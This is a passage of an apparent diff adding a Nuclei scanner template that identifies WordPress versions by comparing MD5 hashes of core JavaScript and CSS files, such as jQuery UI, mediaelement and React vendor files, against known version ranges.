+ name: 4.2 - 4.5.23 + dsl: + - "(\"500b56f16499ad4010c6cb1159a00ef7\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b5993b66434a99eb5b6f8cdd716f19d0\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"1b571c6695d5b8dc97ff051254fa953c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"906dfc74dfca0498666bca77e5c6889e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-transfer.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"07e5b0dea800777dd2108788b56ef90b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"70d7ff2b68aa36956b1c7fa6c0b44191\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2d541c6d1e13a0f9bfbccdc6a68710af\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4adf0d942931b49ff804a3df76f91473\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-pulsate.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"bf836f20530440115a2a8487ca7021c5\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"d31b2660850bd11ed7f4118ee166f1e9\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0d28e73bb53ab02d4951460898c8ad8c\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e68aa8b524b4726b33456011f8e08997\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a1046ab49f04a3d7eeb33d411adbeca3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/core.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"9ce4e157448487d4efe0ca538f656a71\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"204d1573e5f9ad0d0c9b61bdffe4a37b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"67314499128fc5f9b92a78e2ac93bf89\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"96ff65c925bbaf3e4e7891a7ca1f2b1f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2fea75d1bee862d18064d52a1fca3c37\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/autocomplete.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"d0ff3eba6258651773c3a5cc909efde6\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"87848b50d8b543b6fe1a38a97a6aea5c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b44ae880533b69eb02aa8bab81bbb2a8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"db0088d80b66d522e8f56921f2f39ff5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c07e20c3fad464dab1ed4c7b43e33709\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fade.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"9f6fd64f4f5ff5893b7b72a235246d0c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"15a40c47867106bd6f45ac103d00d929\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8a30f21e345577b420a78c5aba2b3156\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ffc8d22a420c7af0b2baec80164c9ebc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/button.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"2ce99e1ed08df351e6a58eb4b6bcbfa9\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"6e0e045d3fe4766ba1cd3ae5830f5307\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"cb7e87f8ae42aed3689546eaf9566d6c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"68fcb351d6882f64a3e5e2f3d6fd00b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"616085fd76fe2c4c2a09d2b94196a669\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7bced8633b0301e877db79c95101241c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-explode.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"c0df625cca418cfd803a11514a3dd1e6\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"605955a2ff9bbd517d58d90651f730d8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"80a3c71f73734d8e64568b208b5cfd19\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2f68b680e67f09ced628d98b2bb456ff\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"07f19a11c69199b50faa6c148c99d4b5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/sortable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"2896e90cc17e9abc160ed96bb86b07e3\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"0ed316ce58771b0297b783130e6b5e94\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c9f94c2964fbe89af48d431e721ee4d6\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"efa8171f2226a422003417095d8549dd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1f7ccfe2bad939d26a1360cb399aa1e1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-scale.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"d57d0830652c29c3e0e301b02b6db754\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c7dce545dd7b39f2e154c7a69fe1b30f\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"bf1461a382afb5a90e22a0d7d462ff92\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"25377707ee8e989c109d24ee5adafb53\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/mouse.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"82835a8960ddd73020389dbfa45c39a0\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"e4a138275da8ed21bf8e49d9b210b884\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3b3c95f5fb16cfa309270c16992dc393\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b317c4ccc9aa140339ad72fa27c77266\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e741e01a2efcc5372d649eb84035ac30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/spinner.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3acf32da612bf35221c09394856591dc\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"b2d7a9df2f6b0f264851faf33b6ac7d6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7c2fb4ffa453c9870793dd257109b9b3\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a597d68b588efa4b8896beea6582c62c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6b95a7525bebb6884e50f3aa0c4dcee4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-bounce.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"4bc4c97924bea4bf7b04d7b46ff4f64c\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"d8967fe0305451de35920fd4fbe18d53\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"60d7f9347ab7938af5cb10ef606453f1\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"030dc5d899ab0c2191629d74281f7781\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c56e07e312d163e6c13f9cea03468890\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/tabs.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"5330c83425ab1b8f67ce63f741427adb\" == md5(body))" + - type: dsl + name: 4.3 - 4.5.23 + dsl: + - "(\"4572c6f0dae66c956ef9774756800b92\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"fc67555a859a12b644ff9edaf7926a96\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"9d119a515eff37751a19f95d11c0802d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b7d1b47a2c57059631f53e42392f7955\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"61f1c4f2116e6de96e6c01488aa78144\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-shake.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"260cbafcbcedc23348a371cb80083112\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"a0274a6716560eeaccaf0090400f7095\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed68bc26b640e7dcaf6e32ea3d3478ed\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"52adac7c5413612aa59472d00bcd0b5c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9805977e847511fd5d0cfd0b0dfdbfd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-highlight.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"95e8ebe62adf187fb4c3b84eb5bef821\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"65d871feccd57666ee19a3df4644a7e0\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"9b1d4283702ba049f9d88e0a75d05f81\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4eba87d378061ff9e0e53a96e96354bf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/accordion.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"334c2ffb0b086ffc0f6f192ea120f3c2\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"617307799c0ec636db3df228d57790da\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"3d655185b6170d7722edad3edbd4eb26\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e89a7c428e49ea602d7ec04809663edc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"842a3a86123d41935c2d1821ee89d447\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-clip.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"c7939457e8ab231b951713475a056173\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"857396f2d8203aba1028fde0009c92d8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"e9294b5b7374f173b76b4286b53faf33\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9778614a5172dfe6a8babd4c86e7d3a5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/resizable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"a5001032177c492cf0ff7c86bc01169f\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"3f04b22aeae2579369c558e39db6d5bf\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e2d4ab1a66c1ec7615c2e17c15c7e081\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"449c1a605e8c304774ed6336d9a953af\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"5ad69e67648243390058495a8beb5535\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"3f7161cf139d5a2c5e6d34e1c0026f9d\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"1441d6a28c1e7069c1e21b757f2b6082\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b7642fa0b3ddf241b7b4ee9d62139d76\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"318747d327332bca86b5f101420c4209\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"65b229b1cbc084072342bfa5f4e1d766\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-fold.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"8d365ec1b3a7ee82f93c9afd441e456c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f5854a487c21837903b3e03e5507cf52\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8785d9de96bad111926ab4d13014d21f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"42a41dbb3565969a5c8e0f0b228aeb30\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-drop.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"57fe560887cac7a5b2598188463290e8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"115186cb516bf141e12b8b8c7f1c5c8d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"59c7df6dedd02a304f58985e7cfb8e1e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8395ce579e994aa4f9911ae86a071a46\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-size.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b00e3dfd6eebccd5ea9aeb3293d85a25\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"3a14499e6b9543cd2a85be995dab077f\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6fd6a0edced7b413d16c500d896d5e0f\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"706b0892dc2ec793f195f2a3f2402edc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"50efcc245d0569281ad367d8d1ab3745\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/slider.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"9408efe2ce5a6b4364f34cbda02f814b\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"7d09316c34df2686e1515795ef0f4cc8\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"4f70432f595fade3c533070299719285\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"6c55f2f9a18a80fbf2b3a59dd9e8c7f3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9aacf2600bc8e4f8a62c7fe648f4ddf7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-puff.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"fe496d6c9d63bc47854084c8b3fc20d6\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"633a3e818838090cdb8f691545977ece\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"0647cd3b8da74c8c9c1fe7a317137773\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7d50405c6e2695da78ba318591244fa6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-slide.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"fa23475fb01c8f4d56da98ca0c1179b5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ab6393ed31d603a7c3b3d723437726a4\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"b3efa3b4e62162ad592e8a8b483b6572\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b13b495e8d1a2b3a4301b9df1829485b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/effect-blind.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"addbe09f173c4f1bd86d41ac5f3b4f4c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"6fb2642d8eb51b75a796cb3e92e6ba7e\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"9ade4cd0f3989a69310012f671fe6f8e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9ec8b798f187fb04dd20b2c36da00b37\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/progressbar.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"b94d71da54d9b4413ffa4c7d792269c5\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"a5e9438e7bac8acb9a71ccf4741009cd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f953a1f80de38a3aa9b33b9035d8a638\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"34c78c33e7c97e65a369bb0137d93d05\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1a9b736b90bcfdfdae5aa66a0959100e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/selectmenu.min.js" + matchers: + - type: dsl + name: 4.2 - 5.2.9 + dsl: + - "(\"cb7db4cbaa328e395a680c78692236f0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"2c771d66d39708f0b0cac4c9922113d2\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a0934e5723eb9982df8a6b7bf07a751e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4c8c34de3de3167ca6724e0f745e3a76\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/ui/droppable.min.js" + matchers: + - type: dsl + name: 4.6 - 5.2.9 + dsl: + - "(\"debf5224c4162887d1a6e3198ed953d8\" == md5(body))" + - type: dsl + name: 4.2 - 4.5.23 + dsl: + - "(\"1a4b2271fd48cc6494bc94967e41b150\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"0871aadc0992a7c71d5b3558114438fb\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8c9c1bc0a5e940af40f55e19d39ed9a0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ee39d7ff1953b6c0b1006271bbd5cbb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer.min.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"0687e33e84a860c33a3a885193a6d937\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.23 + dsl: + - "(\"55349dce77921ce5ae7b0c66c0ec2e4d\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2ca8d8977881d5e608aa01c45bac7dce\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"28a8a27aaaf51e9de260514ea7ddf409\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5fccff0cc3e57ff5bb1436e7a0bc2566\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"8d16f9c2327813d9ebfd04769999eeac\" == md5(body))" + - type: dsl + name: 3.6 - 3.8.35 + dsl: + - "(\"a7f7bdc09331cf77b0f7b820eb59f75b\" == md5(body))" + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"3207ef8ba63ea7671e48d937393967e9\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"239ad0ddef90fbac27dd0697a10db8f4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9109ffc835f229e4cef66bb179a67e0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"5c12dccb796dfc0f9bef9745965cf595\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"4ed19dc7687386bb9c6c172dac61f4c4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c03f1bc87e730cd0e2e069360f47b82f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/renderers/vimeo.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"4e3e1ef6029d44a9362f7ea746b87994\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"a3677881601afb0f678c2c207d850799\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"170687433986a4a559fa4f16b1d7c70e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement-and-player.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"bfa6a78578b3e436a00cddf75420469a\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"16a432e33da81058ca49c643cae0c318\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0ba79ba4228a86dd0a14a72ddba4a059\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.min.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"dec8fc8727389a7b012257960f663dff\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"2890d236e5e44496f045916182f54d0d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2d369dd8ffa89cd6c4d66dbdf6ccd67f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelement.js" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"f3b0e2379715e4ae6d15748d14a6dca1\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"cdfaf4cf4c18580773c4af4fb27ff253\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"91f08b610092a39dc11a5e328f2d215d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css" + matchers: + - type: dsl + name: 4.9 - 5.2.9 + dsl: + - "(\"a7f30f0c309921a487640a98569cba90\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"c53c2f4dd23046ce2127477792aecb20\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2b0dd7eecea03b4bdedb94ba622fdb03\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"c6ef74c7ec0704ff4cad3b5ec7bfa055\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"82f6e97da7739bd618e9ae38d681db71\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"22aa1f16fffcd8050495b19e49143bf1\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"43e0a7d0496e085696a01339bceef3df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react-dom.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"1c4cddde3c73b3e706b6ad620582daf7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9331dc818181c1df34cc866c03bec20d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8e891f5946c8e1780e362268cb45ec8b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"dcf51763fb4a654e15a4e6e7754ca5d2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react.min.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"ef752361755a318f70b5a3ae9cb2ed3f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"6154303cf1c576b1479a67e73f93ecb8\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"f80458708d0a9701b76d741d35b6722f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edf56a42bca6b565bf7dfcbd8ffc221a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/vendor/react.js" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47f592e79ad9ce36525bec84a9ce239f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1427ebb68b9631c7f3b0526cb513aac7\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"f4ea9307973c76798b7a18f1ddfa700f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"bff81f643a904be8a3d144f7a8142c24\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/wp-auth-check.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1a6d05f43ff7076b053b1802ecac92c3\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"a209401a035e188aaf75fe3392d48184\" == md5(body))" + - type: dsl + name: 4.5 - 4.7.3 + dsl: + - "(\"85752ca8c899aee3297e87479fd51994\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"12808b192ca103549dd90b62be9b144e\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"8d5e06994737d4e3e35fd0688151f55e\" == md5(body))" + - type: dsl + name: 3.9 - 4.1.32 + dsl: + - "(\"fed09c9b6be237c0fb4ba5c0468bb7ee\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"04e24483fe78930682a25e79adb99342\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"4c44e4da916e1604d58cdb6c662cf4d9\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"d319d9d88ee8a04ea37abc078e8cf9b8\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"07fbdbde3eec108e5709caa94402475f\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3325ebb49ad7b3dc830f93d8e385b255\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"30a8f714d12fb7119a0a6b24c448868d\" == md5(body))" + - type: dsl + name: 5.3 - 5.5.3 + dsl: + - "(\"8868ded3f5e30dbaec5dbcb7bc104b0f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"826912016774df9daa3e21c24966ba4c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery-migrate.min.js" + matchers: + - type: dsl + name: 4.5.3 - 5.5.3 + dsl: + - "(\"7121994eec5320fbe6586463bf9651c2\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.2 + dsl: + - "(\"e489bd9969f80e9ba1ca4737179884fe\" == md5(body))" + - type: dsl + name: 3.6 - 4.4.24 + dsl: + - "(\"512b871a2830e44259bc3ce3343afcd0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"79b4956b7ec478ec10244b5e2d33ac7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-embed-template.js" + matchers: + - type: dsl + name: 4.6 - 5.0.11 + dsl: + - "(\"d6c3fb049f657928eac2cd9c7eef6925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ed541cbc74e8e5bb8b8d72160d335ddc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - 